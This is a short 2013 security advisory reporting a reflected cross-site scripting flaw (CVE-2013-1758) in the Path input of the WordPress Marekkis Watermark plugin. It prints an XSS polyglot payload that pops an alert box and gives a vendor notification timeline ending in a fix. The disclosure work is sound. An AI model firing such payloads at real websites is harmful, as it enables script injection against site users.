WordPress Marekkis Watermark Cross Site Scripting

`#############################  
Exploit Title : Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability  
Author: Aditya Balapure  
home: http://adityabalapure.blogspot.in/  
Date: 18/02/13  
software link: http://wordpress.org/extend/plugins/marekkis-watermark/  
CVE Assigned - CVE-2013-1758  
  
#############################  
Marekkis Watermark-Plugin description  
  
Marekkis Watermark-Plugin for WordPress can watermark your pictures an two different ways:  
  
Insert your watermark while the picture is being uploaded.  
After the activation every picture that you will upload with wordpress build-in media-uploader will be watermarked.  
  
In the configuration-screen you can set up the position and the type of your watermark. It can be your logo (.png-file) with transparent background or a free text with color, font, size, shadow and transparency-level of your choice. See screenshots.  
  
Insert your watermark on all chosen pictures from a directory on your web-server.  
Marekkis Watermark makes possible to create a watermark on mediafiles that are already uploaded on your server. So you can mark all your old pictures with the new watermark.  
  
  
##########################  
XSS location  
  
The Marekkis Watermark-Plugin in Wordpress http://wordpress.org/extend/plugins/marekkis-watermark/ has a Reflected XSS Vulnerability in the Path input box.  
  
Script Used-  
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";  
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--  
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
  
##########################  
Vendor Notification  
  
05/02/2013 to: - Vendor notified awaiting action  
17/02/2013 - Fixed and closed  
`